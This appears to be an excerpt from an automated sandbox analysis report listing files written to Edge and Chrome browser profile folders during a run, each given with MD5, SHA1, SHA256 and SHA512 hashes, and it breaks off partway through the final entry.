SHA512 89597d65306707b63f95187c68ebf5aaf194a5b87e043a9777c5fba3fcc2ee21565a21c4fbd717c5f7feae65064b9b7ae27114b949722e8dcf69fdd20320122e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000057

MD5 7651b1187bb58ac4c7be625337b35e5b
SHA1 307d969ef4137a66fe2793737dc1c546587c7f43
SHA256 0632850d01a46bc2f8c223155a4bf6c398b33596bb711e098440623f118c3968
SHA512 a81d2f768af155bdc642941404e7ddf95a2cea33c9374acb5fe32f6f5266e337fbef32f904551f61fcc9f9ab5a1c6a5ad130ab85b38bc2258e2f82c0ca1e9c7a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000051

MD5 97445efcad5274e3355ff088c0734ce4
SHA1 7058b40a1263f9e562ad55200d80e5ba739ddca6
SHA256 721e4869bc4c8f0f31d7455c0cf6eab0f634c92e78af13061d1e66fb88f153be
SHA512 ad9dcd31b7f02e48a942c0dcbcaeb7764cb1eb94710252b94d8abe5f41a07e8ba8fda5be049ce4bb6f2d8dcba9e82a1f49a831ebb9e7d7c86afec05e6412b5f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000070

MD5 9cc74dab45e360d90c7f3f189e18b9a8
SHA1 aca1940329422b99516d4b48a30700c8cdc2d042
SHA256 fa9471b70365a74dfa7d7ba7fa80ca30dd332c9e6fdb91726e005680d10acb3c
SHA512 6216a5236c4ac47aa3ebafb4e8ba04930f96b4ea5934a30771b197dde0f4225c08372e8394fd93b6ace14ba6867345cef41930806cdb49e56ef9fc8571d77eb2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000054

MD5 efbe7b6d187dea0d7f803276c6bcf37c
SHA1 de5905dea9fdb2ba98cace82fe80eaf4385f233f
SHA256 a04d2b858190dccad1f3bf431b96d150a10a87d0e436249347f9ebe8721a85a9
SHA512 3f627e3b4b59fc9b2f8a787b2095e71c0fbfbc43c61c60b19eae084186bef531b05043d65a47d60daf60bcf805078870335585df388eb631bb6d983fdafdaf0c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000053

MD5 e7789186ec22ea8caf2d9978b893baea
SHA1 ed0f94668dd8e43e8bc4f3c2e50654ec3029255b
SHA256 4ff5155985f6257327889a66f2974aba80fa396dd9d6245bf5cc92fe48343eaa
SHA512 d1c798badfa37be51ad621d7b2b34bffc041dbbeb38631f00765310689fca14e1a37831b209ac7332d537d4ce8893ec02ea2990de255400d843f4402564ef93d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000055

MD5 67e30bbc30fa4e58ef6c33781b4e835c
SHA1 18125beb2b3f1a747f39ed999ff0edd5a52980ee
SHA256 1572e2beb45d2de9d63a7e7fe03c307d175b2b232bad2e763623dceb747729ba
SHA512 271d4a65d25b0a5d2ff2fe8f3925fc165d9b4345893abfd919061d78ffc5ffe8890ded35e41274ad8b860f06264b027cfea6030ec9411a4e03bc6d7cb4d4d228

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000059

MD5 a3d206234b56331963ad9ca0dc94a807
SHA1 5cf806150e0ad8a26a73a895aeee03da23e75ecf
SHA256 8a0d7b42cbbb3159891a12810cc8c36d53ae0634404ae938db894983e46812dd
SHA512 13f3260ed071fcea410e2e38908b9643285e4b50518ffd1fb15838c87835128f6f5a4150e5bce646ab63905b6c7108a70c3cdb0f76ade48ce2d8bb610b93412e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005c

MD5 27e0b0d117c9b50b2dd782e77926c41a
SHA1 f6b69d3570bca5026ce8fd3670224d4f10a5d833
SHA256 f7fa3985fcc91607f1afd125a17333779a8c3e2fbae3a243b1238bba4c63548d
SHA512 632371a460db88e640f90e543bc83b3163ca3d23c474b5ebd6ede20949869886727129538d213a33549d70cafec5ff64256c743f7f87bb140ccc19da03eec002

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005b

MD5 edf8906bf0f8ed9cb2746d41333085d1
SHA1 d7f11d2f5be80a8f4a9dc56726991fd342c2cdd7
SHA256 345357e8e6c3b76bae5266a7ec1af790542f6d6668881bc249da7b643032600b
SHA512 594ae78e4089e790c04849ed33e8f9f33772eea93e66b4271ede8ff8330308d3072df2af714186982864ee5d00242685988d8149d027d8dd5ff4e985339be3bf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005a

MD5 c43180875a134a0de1021b02c11518f0
SHA1 8cbe85cecaf1ba019f1dfa27339a41f9f824d5df
SHA256 a35f1767cff2c910b8485a038a8ccfd73ebc8fe7b74199dee7bfa8d238f58899
SHA512 24e6e3521ce8464216eaeb0f50dc1e5a6eca04717a291c6627337867b4825d2b5d65280c4b02f20efb9b1cad85e50f1ca6fed1a309ef904085708d4f781a7596

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005e

MD5 d6c0c97507352fbdea15e4a5ba3c0ba1
SHA1 0c528a95801032e7641f678550ea0cf37ea030d2
SHA256 4d7a44a649d1f1a199e380495c3bb61e84c72a06d5489f9b797698bcc8e4e33b
SHA512 44ce695fc37875d7cfd6affdaefb8abf103822c2471bd24de741a678f50855821e90bb40b0a3a9bd2c9df1ab1f406009df488773c9282ca89b3fd02b4ca70216

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000061

MD5 b7a2ad9645afa7b6047557956d9540e2
SHA1 afe9d2f2c53149890784506e97057536dc39bd8f
SHA256 127539d026f851bef3cb66520c714050802898d52a93504114b74da81e197454
SHA512 612416421dffab66c38e80bb3b26884384e5029f906f1d7ef8b3f9a38948b52dc3c0e31dcd9a704f76416c8b8119addc1783d0bb229b229dcf539f0361c05a52

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000060

MD5 e7ebe1f25cf841afba418b6adb14c03e
SHA1 6323caeca2bb3874af83434c5494123536586754
SHA256 44fbb37daa889bc223f935f35f2a689b19a5963f04889c5e8e6c92d39fe90b42
SHA512 e8ff648385cdb5ff2fea918d588008722c1f6b4f6ea1852194d5412e27dcbc1e0df3f3f8b1d5a3164b7120ee34656aa2cf639d46a151eb90e828218ef7200a9b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\d1eed51fd30a293c_0

MD5 829b9869a354534f157f59445c85528f
SHA1 32278f14da5202e5a3e2f14a22466e9f9abfcc27
SHA256 11547a34bcf599d49c74168bc8fdb991c007c9307ad1b9995fc11bba705481c1
SHA512 34d50da5bc9cb7390939282302db94e8ee4e5907c77f2c2cc39faf6457687a40d187b59130d79a7f48f1e70ff56465f53ec09dfd49ca3e9625887ac0f5eb8660

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_en.softonic.com_0.indexeddb.leveldb\MANIFEST-000001

MD5 3fd11ff447c1ee23538dc4d9724427a3
SHA1 1335e6f71cc4e3cf7025233523b4760f8893e9c9
SHA256 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed
SHA512 10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_en.softonic.com_0.indexeddb.leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00006e

MD5 9c6b5ce6b3452e98573e6409c34dd73c
SHA1 de607fadef62e36945a409a838eb8fc36d819b42
SHA256 cd729039a1b314b25ea94b5c45c8d575d3387f7df83f98c233614bf09484a1fc
SHA512 4cfd6cc6e7af1e1c300a363a9be2c973d1797d2cd9b9009d9e1389b418dde76f5f976a6b4c2bf7ad075d784b5459f46420677370d72a0aaacd0bd477b251b8d7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000095

MD5 e8a1128d38affdf098f1bffb3b9f4406
SHA1 4e499a993b2b0b5bf6e005015146f98f5e447ed2
SHA256 f396f7186913744396d418b82b49b283f0aca0befa0410f44f210e3b03a83b4c
SHA512 2ab228e1ae08d9276884299a75c41fd4102ed63c26723a31607a4082d9a4099f14e006178a8ac383f8ee57db2ec11c57ca756b09c0b858a63d744d467c5bb690

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 be709c5a280cec390e39dd50db08b90d
SHA1 187f05ccbfe41fec0c7d8c3313bf77bc0f6d550c
SHA256 a2bc719bef01e5dba73c95cfdb34d2827dc6fad0e9ee550ff793efbb4bc7e1d0
SHA512 7f6c8765a115ea6771f662283bd6d7c3da3e3ee1b7b3ae9b8f4e74f305c577cb2b84c1ccb3e6e748fb91c83420e1a1c990b35ab8dc1b40aac6ce0ab7d6343e83

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 705a2b391310a135593c70e033c1b69c
SHA1 d1ec486a0ad28bd8cb399e199b623e2fd1537da4
SHA256 09548d40af85f1071a3366a2c8b6fbdf47894c845a01dd199db4e7370c36cecc
SHA512 09751a8d415e48a935f42351f2af92044f7e60a4d61fda4a63100fc411e9968b7bea7e001fd6d4cfc6cca41f1f086b3ba1eb7b1d591c6be2f5e322ef9fe5467e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 a14b636b2ddd46c48e22334508ec0d34
SHA1 95d401b98f913d8df99db75713a7a3667362df3d
SHA256 d548e99ba2c100b5027a3c6a149dc496a2909fff4b917dd21d378dd8943c1dd6
SHA512 f23fc9c60fb78e20ecfd3e968be243cfda15c208c8f4623b7cae07ef33c58223765839b1068f90b19c02f2eb4915f20902eb9c6e7361d4b930045390b1502f8a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 41b74ad3c7e827d13df8ad2bedbd522a
SHA1 ea8e29758796ed08ecd6ffb797b30f294e2f93aa
SHA256 64422c30c05ffdcbb75b43ef228b32d31fca4616b08437b5dbdfae59c6d64870
SHA512 f97e590343fcfbc4e7709bf3178198ef5c0437ebe6b0003ec9c8b5338b57ca09c88cdbb23c87a9130e2d6e683db6e32413892cdd700265bef27595184cf74737

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\b80cbf36fef9e7a0_0

MD5 6b41588f78ecfe69dbafad4447095e5b
SHA1 b6d0f5be0d508a784c7142afdb50bbae02caca2b
SHA256 5a1fdb860a53bfa4bb3baf38281ae7324716093a6806603127b5246f1099f7e4
SHA512 63a7b88a26461e775802d75294842421eed839dc554240b5efd1bf879b6e2569730a5a602bd435eb182ad5cbfab5765c3839b93bfc41a18de22381c339b1a13d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000a0

MD5 900e217361ce1f52ca334eafa055ede9
SHA1 a744d334b154b6aefaccf685526156cdf3f82e7f
SHA256 6e50c78089d18760870450e7e82bdaf56c75ef916b4b9e06ea3ee5d74517a9bb
SHA512 90e568da4878070c82c7c0dfbf617ec6524ea61c805bda867dd173ef85d8026618aecb5d38a15e838952a6a77b6326caadede433ecd401a910de760b610033fb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000a5

MD5 1cb357ae9f1541d4e0317f5e1151f03e
SHA1 97d228cb80ad0e3e825a208cba9a22a9b4e72c9d
SHA256 02aee346bf43f006fba08e5e833dc7474b1086bc45a3a512b46b726369d5ada8
SHA512 087ecfd36482a571dbf2fd7bb1ab17186d49d15cf286333b4ac7715cd1f32c4b8abb9b7685fb2f5bef5e182be8464fefa19269a85c32ce418edbec26d5a87f67

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 d75c9002ed1d82d0dbc17eb3083ea5cb
SHA1 8d5d7dd336fe33c086c6fbe00ef2ce0c58932152
SHA256 d2c355c54bfab22708638509f832c18ce9e630945d854430fafcbafe25c60ab6
SHA512 2313984708f6648821db061e45e72fe0e9dbf8a700d463726fa976edf9d9b610a0945d9d5224b408bc22309ee85efa4a709af78e5d727006b7d159a197e54195

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000aa

MD5 ed20984592313d7070e996b2ef6e05bf
SHA1 ff59467416da2142aef246bdf3fdb1da2018597f
SHA256 ae2399f4d40dfde8294224739261b759687ce4e7a828537d0a06943af4f6c36a
SHA512 233f689631f95e9bb304a40abdc3e00e20de9dbd47ceff494d13e0a0cf05c3ce09bd1dc1c30cf170ee2ae337300fc26db45e64d0f61e6b742695092601074dae

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\ad65f8cc700f771e_0

MD5 9dfc7d720a93319245863517a2faea6a
SHA1 01bf0f511f6d57e398999a58f94a2ed656970041
SHA256 4724f6af271d6b894c34fe69d4442d5d4c1657788b70a3943f6e06bc1e7d4c79
SHA512 350371b5d2b88a86501b218b6dbbc404f7e9665ad17c8658741fbac04212539a45916b901c4530dc6e458ef370c469cb0461b57e97884d199b38c6190b7a246f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 2d47eb7f08effb9022986f6b01634ce3
SHA1 3f6211f05bd5aabe3378093160ecb42a66f5bf4c
SHA256 bd2e1416d11217bc7ed9dff4d0e5713804fc2c9de965294d97785d05921131e5
SHA512 58af321e2bb531f4408415021f5d99f3c0e3b2831be65c25734885fdc1cedf49faf673a4e34fdddedf11f6ee36564c5786c18f7019e0ee3ccd2cbac4888e7a6b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 ab6af458cbde394f64793c86244a7070
SHA1 3bb388430a49587a3bd46d74d1729597e3a227a3
SHA256 19e2270001c9f8b27d366eab0037c7686d82755444b0e924fe7bdb281e847c1a
SHA512 0f299627f3713e39953fd82949afaf410a9be32b29f7e20c4e36f8fa377d2243840a2cae3515a65453647c9fb25d72231249957f6731ebb73cdf407227d7c835

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000be

MD5 e047395e80da4f6d718e721aeff4d817
SHA1 ca68ef6f6052e2417aff7765dda8b50eb976e939
SHA256 5f0d4f266c01ac56d6e7aaa40505ff62948498fad80b2dc11180496bb8ab43a9
SHA512 69f023d1a2fa28ec1bcb2183f4a1efaf94bdb5e8fee741ebac754b0ec88698976b1e822918b2fb306d05d970090f3e4f9b9869d06e3a6f2778c40207f2c9317e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\f1cdccba37924bda_0

MD5 33f1570105adf3f75b48c5c86a1dc553
SHA1 1a0da201562c9b5abac4dd21d67937aac80c69f3
SHA256 a0e9b147f45c6ce2470fb019d5f9b27125af93d09e7e5b4f565d61c69d21814d
SHA512 83451cd9f00633a55f3f3a16f39d8b1de5c1c96ebd6112bbe2e07628ad12db7af4c8d950a6816c5fa866f52c76dc5bd13f06ffc66f943b2411778008000e124a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000c1

MD5 c3ebd36d501d8eaf45d1808243d8dfff
SHA1 59ce738da23382023cb642d57dac5b89400e0789
SHA256 911a800c0ed057fc330ddf1bf5ada4ea109bf753c88188610c39ebd70898bce0
SHA512 845093147360fc32fe2033bf8ae91e9e71b06392e2f4ac8fa00c1a1176885900b693c4632c2141319b6e5e9886bae83493b7fff2e47de6ba1d0f28305c816d3f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000c2

MD5 5fa1c1bcf62eff3db101d98a711aa059
SHA1 09e96f7c65f1f1ff3bfc286815466b2a5385b20a
SHA256 2c821112e1f4b8b75563cc7e256d64d24794942c4cb2f47e01e3766e5d7e0d11
SHA512 18c2194cb792dc3aaed37c5628e7e5a9bcd8e4f470b9c17cc29fd108db3afa23bd3527139d5b30eca93a49a7248d255483d1b83bf9c6780aa4553bc3f369a0b9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000c3

MD5 29c5139541f127e923a5cda18a07dde7
SHA1 da75aa843a1d0bab5d7e28e50ea57d58de3808d8
SHA256 0c6694599e479ff5cf4e057143f84084804c79dca06d985bf325683ebf3cddb3
SHA512 e48dd833147860e3813fe651e8a6ff44b0fc35ca9742c36dff2aabef4484a526ebec1e890235715728b9ee85955905369d477c9a0ff0e7b8c25bd3b6c1eb1c79

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000c4

MD5 ef0d66d0043520de62406cb325fa6b3c
SHA1 0c515bc40006dc17e8debba459b4cda827fe8c28
SHA256 a00f2ec51ea552c71b93c28e96ad7e99f61ec4195c4eaf321a57c0935e12a4de
SHA512 998a499431ac743e9279af15de567e8cb15e4e916b02ab75831d4d8cf03b7e54b3794daed1be13abb5b627599ee853afba9c3a65eedb9300d4e817ea61863316

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 8f79908bffb32b2234a8f838c3150a05
SHA1 d5e904cde82e2b737d635b1bb32714260c1c147f
SHA256 6db74819b08e3fbbd042272b440ef19dadde80fa5925a29db8ea69a8b2dea97d
SHA512 749f6e488d309e317541cd2b2a5de78dda94c218b82d4c9f532bff3cfbc9939c92d938b2140a7fecad995229259b462389367d508c91016200bee6de63e85086

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000094

MD5 a35157a7d073f299b6ddc49b28b10aa9
SHA1 95d355c65d14d65ffafe8aac314062147832cbd2
SHA256 de22b26d4f90c136cfa0428879d1df45dfeed8db48e4319c79d88e11536b74a6
SHA512 7cb0f10418b4f28f51349813a8c52ce6255fcde26b3605e004f9f7cfe825a26ac1108a60ce545e75e07ab1e64df2cf695ae7d208bbf45b6aa22a9217bb1e8387

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000cb

MD5 65af2df6872ec4ef5e80a93b333daa6a
SHA1 8de04346072d4f7e9949d37fbfe93faf73983b52
SHA256 cc040ae7d36312a69eab251d2a3390c364c3acc506712fcd1203c79de5a5c617
SHA512 cbb103b11b73e2d77040d72a4fa4d39215d86863ccfe447f3f7aec817cd9bbd3c32248856fb289319c25755cf24dd26b4191d33ca7e99e38a106aa48df3d19de

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 017ae111eef8b8fb19082bb16ea5bad2
SHA1 550e0f4fc4ffa57861709f4f0aeab3361efe3c1c
SHA256 9e3f171ed43ef6482199853ae94f376f78426b632577f28e7d588ef09636bb7e
SHA512 f0c895c677d23a61ed2fedec29f2b7b7ca179cb9d5b3d7ec3bbf3e495e3c7b5c929b00fe72f9be0d517caedfbd0eb4a12ce3325d97f63126cca834d9bb727e5c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 baa81cdf45d7dad1fddf52b6c8e608ac
SHA1 f9fa93c68318b3ffe1932552defb59e366eab081
SHA256 bc3e2aa93e69fc568d0e927923f5bf9b9e08e3211c7444eaed9e219868d70a7f
SHA512 5d24effd7cada9b7ad37f28fa7699cfa5bca76345b48910fe19b8edbefbbe1a6a6b0c3382e55082acaa5f83e0d2576a94231fe2258a7d4f42c22018589c2fd2b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000025

MD5 b07f576446fc2d6b9923828d656cadff
SHA1 35b2a39b66c3de60e7ec273bdf5e71a7c1f4b103
SHA256 d261915939a3b9c6e9b877d3a71a3783ed5504d3492ef3f64e0cb508fee59496
SHA512 7358cbb9ddd472a97240bd43e9cc4f659ff0f24bf7c2b39c608f8d4832da001a95e21764160c8c66efd107c55ff1666a48ecc1ad4a0d72f995c0301325e1b1df

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000024

MD5 2448f641fbbbdd88f0606efa966b052e
SHA1 25825aef444654fdc036bb425f79fd1c6fc6916e
SHA256 03f060bf37ba360360d6a7413d98e485e7d8e6f69e6a1de300c788d439b78d02
SHA512 d56e3b19d3f4c6d6663117000b99071cc453b6fd93f708bb8cb92d5adfa0eaab749d8d6cef4f19fbba548d31edaecfd0a74ca55dbca7d5f5f1fe66879b27b9d0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 b9d4b7bc434f636b40f36ace2bd38d9d
SHA1 83de998f42e13e7cefd1e27142adac525e2b8762
SHA256 87b11e524822a5d1231b7d566ff8c9d3ab27f43ac2fc07bcbda02225078ca460
SHA512 38650054bff5566806e27cd58ee9b4fe4995f685f898d55290fdd535ea3a687021ba6fdc2cbea432b0de16fae5b9f93bbe20c796184f70bec87a2ab4890c2baf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 e973892fb3e5a3c0621284cc221ce015
SHA1 27b19f062f4b18ea11cc711720d70412d39ff9d2
SHA256 a58b5c95af7134a03b75f524962a90d5e869be8c2e30a9726b48a738af311077
SHA512 1430540a1a0ad9ccb5e21afbaae339e631ae3ef65824a585c2f93ed7f3f081f7c5ca6cc8db19a732d6eb014deb637c7e8ba3ef0a8b4ac63fb1f67764ae9e9f90

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 33ae110d09a4b692dd0f282d6ff97026
SHA1 8bda3943a87f5a0374673ac6b11d546e11b24a91
SHA256 52690d32aa26cdee3143c471c057c6dc553bb9737346ea08f7f7b18170261f45
SHA512 691f0a390f53f78a4554e574c93e730409bba9f2c8501dda7b2633cd8c54b08ced4ee792626c9710b0198455dfd50d54320ed031269483f06cabbdd007221963

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

MD5 9df3ca9f3a634f8c70810d72233a3947
SHA1 083ebf3ddfe2fdc304eb321637b84406da75053c
SHA256 7fed9b7891c01177415f4f662d62ab4056537639605e7712fde5136bd430b018
SHA512 d60b5869654afecc446088797fe99b31c324280e4d0dc825de692c1fe457391884c41f18a9a0fc33d479c52059e6cb3a550da1cd24d68e83bbc55e4b582973f5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000e0

MD5 baa80a18dd87df5735d95654441feed0
SHA1 e600bd34f9822eacbe76dccac24d70178a839d2c
SHA256 cd12b1ca0960d19a282b891a804a3c21729d00ef26ea23b674e908465d4a691a
SHA512 ba381c34f3be056d6d44debc209d97921c2bdd8e3af66a8a899e4ba2b67d163395789e32aae31ee80c7d0d0c35685c01d1e734ebcb7645ffa54a72f0729adab2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000d8

MD5 cf25b69b67cb91e9a406b4bb7af77e7b
SHA1 97b5ce1a4158da00f07a69442e186e11466d3e6a
SHA256 630ecc29e060410a18110169612bd8088a977b49a85d613572a6f35cd42fa44b
SHA512 168c70a7d972087a352cd98c7870a768fa383634ccdae723595b947d059da0f52657620a9a4dae0636884cf4b61edd223d30fe60aafac4cc5ca867f28ce459ee

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000d7

MD5 1765851260ede9655f00ba2143ffaa0b
SHA1 afeed1dc3f1291b2f78e9d97cc761d320ce1e5b5
SHA256 1227f39caacff9bacc1d950468481fc51a7403a9a2f85d01e56b065e2a37651a
SHA512 23273e0db5be21a62dd713febc7ad30bf21891f4c433c489412cc4f67c8d66281a9d533b55687d62c47635bf7278339e03e5b2be37c7bf331940c619e411346e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000ea

MD5 af7ae505a9eed503f8b8e6982036873e
SHA1 d6f48cba7d076fb6f2fd6ba993a75b9dc1ecbf0c
SHA256 2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe
SHA512 838fefdbc14901f41edf995a78fdac55764cd4912ccb734b8bea4909194582904d8f2afdf2b6c428667912ce4d65681a1044d045d1bc6de2b14113f0315fc892

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 9a975440cdcf098f22e3f42180a3521e
SHA1 e5a3d8dcf0685865dc3276789047f5e0a47f7f81
SHA256 f599e001512a108ffd10562267c3f383499b725046ec873dca167da493928c90
SHA512 4294718ebb920ff1bf73aa261dfc75d5e349f3d8d0453c2145f3be61e203c2d961e4fc74186824b2116fc47ca82fdc836f1a58cc6759dd1d004963048f40f138

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 94b2516cdd59f63122007d6daa4ae797
SHA1 22b20b8d4c05beb0891399caf7d4c834ec5beca8
SHA256 8946bf2891e85e375f05d8935f74d561a1d1452c0223e3e2d54b5a38bb05655e
SHA512 6b4124e9d74d8771dff74098c60bdc66221d667f346e631b259929cf1e9b58811ca3e0923f3fcb93540253f4368c6ec510bd91c722799ee05bd8b13495803b63

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\24d4ef17a5d603e2_0

MD5 68ce50815b850e628b42027c312e0888
SHA1 cc048c5f6da5d7fdce0af103427ed83cc36a71c9
SHA256 564838dec120e48bc64d6d607f6fa921ccf6209e2e2fb1f5cc099a8563e1bcf2
SHA512 7904f75b04f470ac36d620966ee1daede1c0620c5b9c562320cc34a08198ba986ff898e92c7f73ed183ea00ce036b70db4cbbb9c1239e00f0ead79b7966888a9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000d9

MD5 c08fd541a259c2cb681caf7f6ff23b83
SHA1 ff32af7aaa57cbbf7323583debb2530d1c83c038
SHA256 1e6dfc066c11c73d6f50e6a6cad530523ffc39f76b4ada26929b56d8305706ab
SHA512 9b3c098a49ee74e22c72268ed9cc4a0475b52a665858935b3d88a904e84d107edbe28015ed12e0b3df6f7b34cdf35127c3e38f6b0aa364fe3f2dc01bfd9a4a4e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\3e83b06c51f231a5_0

MD5 bf8067367997a8a9b879e63a4aae3f4e
SHA1 7af97a2801835badfe01929180457d3792ca43a5
SHA256 2299ade150d733435bdcb836c56acde453c348b25d2eb10b00f9492e4c823133
SHA512 143f0dd90bd3cda86b0a7a00c9acfa15eeb1bff2d76e3dffcf9638ad11d96188bcdbcb67bf9a56ca194b4dcbe3f3ac2352412ae6ae674aa9fa9d31ce9c0cff61

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000f7

MD5 350267de03c182764d9dc0fed01159dd
SHA1 f19fcaba1740fc49e6a42efd7ebe2156e3748c2a
SHA256 0f568e182cbf9a0160f1228dfd92e102a434ef291524f795b49a6ddd5492ce46
SHA512 c660bbfeab311c26ee0e26dd2d134e5ccd0cf1b0800efb7145c61618145825d23cb1fa9c340a7bc36c8246b211c8f55dd277076d9db682d42df0f216e45c501a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 57d18dbbf6e1a22b0bf0a02629ac9d31
SHA1 784a15ada52442545a36361bf232596453d9ccea
SHA256 134419c70245da5eb864c5b1890b17c713f7ade5aa9590b4b08907484ad98c39
SHA512 c387f2d8e91c6fd7bb2b2d5dd6e2ebb32f848071c5983e26da931a5e174e7addd62f32a14477f778f48838371f2c224c073c979bca76383d2da1d6707dde9efa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5614bb090f2f0ec0129384e331a9186f
SHA1 07948342c86c8c157a8825d25d9a9c371d2af8c4
SHA256 9d9f04d30952868f0d1ec389b6552db083d443ec1275ca2fb9d2d7ad676f71e1
SHA512 59d7895e7b4348f3d2acba427a8238dca5faa60bd6c29c5421efd2a770ac55b07879bda6461d4b52a0845260c27e637a4474e15e0e288c0ef4f75cfeeaa35d67

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 c49a1e6ad2c5d4816844dbc4dba2f81e
SHA1 586f134c2d9297daf2828c46ebc9ec4abc7507d3
SHA256 93141039f1f0b4fefe9718ad67b8113babeacb3e706140df7b7cf54a6082ee38
SHA512 2259db74f48aa8ce21223c662b49065bbe739025cd35bca80aecc8d31b44fac4430c8a5308ef55aa04b30b22e4a932c90b77d9b79b03086f8b9cb4e561e305d1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\5032715d5d104169_0

MD5 ad101202a7aa6c5d25a68ec064feac36
SHA1 53907e295921e1ff8f54496d8aa71667d698e170
SHA256 d463ddd1e45ed6604a476cfa9f5e85fda508788d42be22e69e9b56e45841d007
SHA512 3642faf06af8c831d296a208fb08904b4eb2043da7044d175af9d3ac76f9e3848ec9f09f68603cf12d858382bd7c76f4f1ca8ed1b03dbc342908beec0ab05cdc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\695c42f61090a800_0

MD5 cc1849f3c73ca5de36826a2946e5e782
SHA1 af45960fb7d73ea049e41462be8de418fd68f4da
SHA256 84a4f495b64fa3591c5c69af32d9aa560b6834fecfd9e1aec330f9b91d0d3720
